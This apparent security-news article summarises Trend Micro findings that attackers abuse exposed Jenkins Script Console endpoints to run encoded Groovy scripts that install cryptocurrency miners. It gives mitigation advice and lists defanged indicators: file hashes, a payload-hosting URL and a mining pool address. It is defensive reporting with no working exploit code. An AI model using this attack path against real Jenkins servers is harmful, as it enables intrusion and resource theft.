Jenkins Script Console used for cryptocurrency mining attacks by hackers

Home/BOTNET, Compromised, Exploitation, malicious cyber actors, Security Advisory, Security Update/Jenkins Script Console used for cryptocurrency mining attacks by hackers

Jenkins Script Console used for cryptocurrency mining attacks by hackers

Researchers discovered that attackers can exploit improperly configured Jenkins Script Console for criminal activities like cryptocurrency mining.

“Misconfigurations, such as weak authentication settings, expose the ‘/script’ endpoint,” noted Trend Micro’s Shubham Singh and Sunil Bharti. “This vulnerability can lead to remote code execution (RCE) and exploitation by malicious actors.”

All about Jenkins Script Console

Jenkins, a widely-used CI/CD platform, includes a Groovy script console enabling users to execute Groovy scripts within its controller runtime.

The official documentation explicitly warns that the web-based Groovy shell in Jenkins can access sensitive files (e.g., “/etc/passwd”), decrypt Jenkins credentials, and modify security settings.

According to the documentation, granting Script Console access to a Jenkins user is equivalent to granting them full administrative rights.

Misconfigured Jenkins instances could expose the “/script” (or “/scriptText”) endpoint online, enabling attackers to execute malicious commands.

Trend Micro reported instances where threat actors exploited misconfigurations in the Jenkins Groovy plugin. They executed a Base64-encoded string containing a malicious script aimed at mining cryptocurrency on compromised servers. The script deployed a miner payload from berrystore[.]me and ensured mining efficiency by terminating CPU-intensive processes and stopped processes.

To mitigate such exploitation attempts, it’s crucial to ensure proper configuration, robust authentication, authorization, regular audits, and avoid exposing Jenkins servers publicly on the internet.

This advice comes amidst a surge in cryptocurrency thefts in the first half of 2024, with threat actors plundering $1.38 billion, up from $657 million year-over-year.

“TRM Labs reported that the top five hacks and exploits accounted for 70% of the total amount stolen this year,” they added. “Compromises of private keys and seed phrases remain significant attack vectors in 2024, alongside exploits of smart contracts and flash loans.”

IOCS

[SHA256] [Detection name]

57fedfb431a717031f454d4fb2809d1f6d432a9edd900b07f0b9f9aca7fb3597Coinminer.Linux.MALXMR.SMDSL64 07ca2a2e0d6ccfcef2cb010fe80a831c963755cc6179aaa95fe6e04d7d076c89 119cdc48db534c6093a24e78120c433480c5fb3f4a1a79270a78d9bf049fbe1c [URL] hxxps[:]//berrystore[.]me/line-auth/cex hxxp[:]//auto[.]c3pool[.]org:19999

[URL]

hxxps[:]//berrystore[.]me/line-auth/cex
hxxp[:]//auto[.]c3pool[.]org:19999

‍Follow Us on: Twitter, InstagramFacebook to get the latest security news!

About the Author:

FirstHackersNews- Identifies Security

Leave A Comment

Subscribe to our newsletter to receive security tips everday!